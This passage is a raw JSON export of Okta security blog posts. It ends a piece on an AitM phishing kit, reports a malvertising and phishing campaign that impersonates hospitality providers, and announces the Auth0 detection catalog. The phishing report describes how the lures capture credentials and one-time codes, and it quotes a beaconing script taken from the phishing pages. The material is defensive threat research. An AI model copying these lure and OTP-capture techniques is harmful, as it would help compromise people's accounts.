Make it easy for users to report potential issues by configuring \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/Security_General.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"End User Notifications\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Reporting\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Respond in real-time to user interactions with suspicious infrastructure by automating remediation flows (using Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/itp/risk-detections.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identity Threat Protection\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", for instance). 
\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apply IP Session Binding to all administrative apps to prevent the replay of stolen administrative sessions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Force re-authentication whenever an administrative user attempts to perform sensitive actions (for Okta customers, make sure to enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/admin-console-protected-actions.htm#:~:text=Protected%20actions%20are%20critical%20tasks,according%20to%20a%20configured%20interval.\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Marga del Val contributed to this research.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":{"summary":"Take a peek inside the latest AitM phishing kit."},"updatedAt":"2025-09-15T23:07:15.355Z","secAuthor":[{"id":"28e977b7-7d49-5b94-a4ef-2ef866bf23e0","bio":{"bio":"<p> Houssem Eddine Bordjiba is a Senior Identity Threat Research Engineer at Okta, bringing over a decade of expertise in cyber threat intelligence and threat hunting. He focuses on tracking threat actor activities and leading investigations into their motivations, tactics, techniques, and procedures (TTPs). His deep understanding of adversaries' motives and TTPs allows him to provide actionable intelligence that strengthens the defenses of Okta and its customers against evolving cyber threats.  
Houssem holds a Master's degree in Information Systems Security (MASc) from Concordia University in Montreal, Canada. Outside of work, Houssem enjoys an active lifestyle, pursuing his passions for soccer, martial arts, and various outdoor activities.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/78BflQYRAMZ06yNpD88cFj/80dbc1c31b0c5a9e8b0d9f40d023c3c4/Screenshot_2025-10-09_at_11.11.41â__AM.png"},"name":"Houssem Eddine Bordjiba","jobTitle":"Senior Identity Threat  Intelligence Engineer","slug":"/hackers/houssem-eddine-bordjiba","node_locale":"en"}]},{"slug":"/articles/2025/08/attackers-target-hotelier-accounts-in-broad-phishing-campaign","id":"09948253-8136-506b-aaae-0285c83e5488","title":"Attackers Target Hotelier Accounts in Malvertising and Phishing Campaign","date":"2025-08-29T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence is tracking a large-scale phishing campaign that has impersonated at least a dozen service providers that specialize in hotels and vacation rentals. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In these attacks, targeted users are lured to highly deceptive phishing sites using malicious search engine advertisements, particularly sponsored ads on platforms like Google Search. The attacks leverage convincing fake login pages and social engineering tactics to bypass security controls and exploit user trust. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We observed at least thirteen hospitality companies impersonated with these lures.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Based on the targeting and nature of the phishing lures, the campaign appears designed to compromise accounts for cloud-based property management and guest messaging platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Initial Access\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We observed campaigns in which malvertising - the purchase of malicious search engine advertisements – was used to lure unsuspecting users of the impersonated hospitality or vacation rental company. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For instance, a search query for the name of one of these companies might display a number of sponsored ads that direct users to a malicious site:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6KchhSwDXuhaoDciF41oew\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 1. Example of malvertising showing two fake websites promoted above a legitimate domain\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3Wyhfx7OsROvwh75NTrpi\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 2. 
Example of malvertising directing users to another phishing site \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Observed domains used a typosquatting variation of the legitimate website. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A user that navigates to one of these malicious domains is presented a fake login page. We observed a large number of phishing sites that impersonated at least thirteen hospitality companies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5jJtfPCU4pQjaDTnSZoprA\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 3. Oracle Hospitality was one of numerous service providers impersonated\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Based on the targeting and nature of the phishing lures, the campaign appears designed to compromise accounts for cloud-based property management and guest messaging platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactics, Techniques and Procedures\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The objective of the first stage of the campaign is credential harvesting. The phishing pages were configured to capture usernames, email addresses, phone numbers and passwords. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The observed activity demonstrates an intent to bypass or capture multi-factor authentication (MFA) codes. 
For instance, some phishing pages explicitly prompt for \\\"One time password\\\" or offer \\\"Sign in with SMS Code\\\" and \\\"Email Code\\\" options.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4kmrDtDymbOoVI9eyhsscW\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 4. Screenshot of a phishing website impersonating Airbnb\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"29OuDoCcHLs7eZpV56RJbQ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 5. Once a phone number is entered,  the phishing page prompts for OTP codes sent via SMS\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Inspecting the source code of these websites, we can observe the following text: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"<script>\\n    function sendRequest() {\\n        fetch(\\\"/mksd95jld43\\\").catch(error => console.error(\\\"Ошибка запроса:\\\", error));\\n    }\\n    // Запускаем запрос каждые 10 секунд\\n    setInterval(sendRequest, 10000);\\n</script>\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The error message “Ошибка запроса” (“Request error”) and comment “Запускаем запрос каждые 10 секунд” (“We start the request every 10 seconds”) suggest the possibility of Russian-speaking actors behind this campaign. 
The campaign also employed a large Russian datacenter proxy provider during attacker sign-in activity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The campaign also employs a beaconing technique for tracking and analytics. This allows the attacker to gather valuable real-time information about the victims who have landed on the phishing page, including: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Visitor Analytics\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Geolocation & Targeting\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session Duration\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bot Detection\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Status Monitoring\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can access a detailed set of indicators of compromise by selecting Okta Threat Intelligence at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/product/okta/hospitality-firms-impersonated-in-malvertising-phishing-campaign 
\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mitigating Controls\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enrol customers and partners in the strongest available authenticator, prioritising possession factors like passkeys to introduce phishing resistance while minimizing user friction. Enroll workforce users in strong authenticators such as Okta FastPass, passkeys (FIDO2 WebAuthn) and smart cards and enforce phishing resistance in policy. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny or require higher assurance for requests from rarely-used networks. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identify and automate responses to requests for access to applications that deviate from previously established patterns of user activity using adaptive risk assessments.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Monitor suspicious domain registrations to observe any changes in the content served up to users. Review application logs for any evidence of communication with suspicious domains. 
If content hosted on the domain violates copyright or legal marks, consider providing evidence and issuing a takedown request with the domain registrar and/or web hosting provider.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Warn users when malvertising and phishing campaigns appear to be targeting your brand.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Notify end users if suspicious activity is observed on their account.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Moussa Diallo contributed to this research.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":{"summary":"Russia-linked campaign targets hospitality and vacation rental providers."},"updatedAt":"2025-08-29T01:06:39.276Z","secAuthor":[{"id":"22dea194-5ef2-5cfb-8c46-f89bf610a204","bio":{"bio":"<p> Daniel López is a Cyber Threat Researcher at Okta, where he focuses on tracking threat actor activity and the evolving threat landscape to best protect Okta’s employees and customers. Prior to joining Okta, Daniel worked at international companies across the consulting, financial services, and technology sectors. 
He enjoys participating in trusted infosec groups, continuously learning (both tech and non-tech topics), and staying physically active.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png"},"name":"Daniel López","jobTitle":"Cyber Threat Researcher","slug":"/hackers/daniel-lopez","node_locale":"en"}]},{"slug":"/articles/2025/08/auth0-detection-catalog","id":"11886729-a6bc-5c9d-bd08-5d3461f25ed8","title":"Using Auth0 Logs for Proactive Threat Detection","date":"2025-08-19T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We are thrilled to announce the launch of the\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\" Auth0 Customer Detection Catalog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", an open-source repository of detection rules designed to help the security teams at Auth0 customers to proactively identify and respond to security threats.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This catalog, now \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"available on GitHub\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", is a powerful complement to Auth0’s\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Security 
Center\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and existing\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://auth0.com/docs/secure/security-center/security-alerts\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"security monitoring alerting\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" offerings. The Auth0 Customer Detection Catalog allows security teams to integrate custom, real-world detection logic directly into their log streaming and monitoring tools, enriching the detection capabilities of the Auth0 platform.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The catalog provides a growing collection of pre-built queries, contributed by Okta personnel and the wider security community, that surface suspicious activities like anomalous user behavior, potential account takeovers and misconfigurations.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This resource is ideal for a variety of users, including:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Tenant administrators and developers:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Security-focused rules helping administrators to catch unintentional misconfigurations early.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"DevOps teams:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Incorporate advanced security monitoring into your existing operational 
workflows.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Security analysts and threat hunters:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Gain a strong foundation for building sophisticated detection rules tailored to your unique environment.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Why you should use it\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Auth0 Customer Detection Catalog is a force multiplier for your security efforts. Here's why this resource is an essential addition to your toolkit:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Sigma-Compatible:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" All detections valid\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sigmahq.io/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Sigma rules\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", a generic signature format that can be easily converted into a variety of SIEM and log analysis tools. 
This allows you to set up rules in familiar tooling without needing to rewrite them.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Actionable Intelligence:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Each detection contains valuable metadata, including descriptions of the threat, relevant log fields, and recommended preventative actions. This provides security analysts with the context needed to respond quickly and effectively.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Proactive Threat Updates:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" The catalog is regularly updated with new detections from Okta and Auth0, based on our analysis of real-world threats. This ensures you can stay ahead of emerging attack techniques.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Community-Powered:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" By being open source, the catalog benefits from the collective expertise of the security community. This collaborative approach allows for the rapid dissemination of detection strategies, making everyone more resilient.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Putting Detections to Work\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Auth0 Customer Detection Catalog is designed for immediate use. 
Here's how to integrate these queries into your security workflows:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Access the Catalog:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" The entire collection of detection rules is available in our public\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\" GitHub repository\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\".\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Generate Queries from\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sigmahq.io/docs/guide/about.html\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"Sigma\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\":\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" All detections are available in the\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sigmahq.io/docs/basics/rules.html\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Sigma format\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". 
You can use a Sigma converter tool \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/SigmaHQ/sigma-cli\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"sigma-cli\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" to translate these universal rules into the specific query language for your SIEM or logging tool.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Integrate with Your Tooling:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Extract the included queries and integrate them into your existing security monitoring and alerting workflows. This allows you to leverage your current logging tools to detect sophisticated threats against your Auth0 tenant.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Explore Example Detections:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" To help you get started, the catalog includes a variety of examples that highlight its potential. 
These cover a range of threats, such as:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Suspicious Tenant Settings:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Detections for changes to security-critical settings, like an IP being added to an allowlist or the deactivation of attack protection features.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Administrator Behavior:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Rules for detecting suspicious activities by administrators, such as copying of the most powerful tokens and checking applications’ secrets. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Attacker Behavior:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Queries that identify known attack patterns, like SMS pumping attempts (e.g. 
\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections/blob/260efc3bc0bb3dd81788c1ca13c6be24e7ffe098/detections/sms_bombarding.yml\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"sms_bombarding.yaml\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\") or refresh token rotation failures.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"ordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Your Contribution Matters\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"If you identify a gap in our current detection coverage or encounter an issue, we encourage you to open a \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections/issues\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"GitHub Issue\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections/blob/260efc3bc0bb3dd81788c1ca13c6be24e7ffe098/CONTRIBUTING.md\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"contribute directly\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". 
Even better, submit your own detection rules via a \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/auth0/auth0-customer-detections/pulls\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"pull request\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" to share your expertise and help the entire community become more resilient.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"Mathew Woodyard contributed to this post.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"The Auth0 Customer Detection Catalog is an open-source repository of detection rules designed to help the security teams at Auth0 customers to proactively identify and respond to security threats."},"updatedAt":"2025-08-27T08:29:13.811Z","secAuthor":[{"id":"5b413046-3f81-5938-bcaf-2631feccae6a","bio":{"bio":"<p> Maria Vasilevskaya is a leading Identity Defense Security Engineer at Okta. With her extensive experience in identity security, she has held diverse roles including security executive advisory, professional consulting services, identity and security solutions architecture, and solutions engineering. 
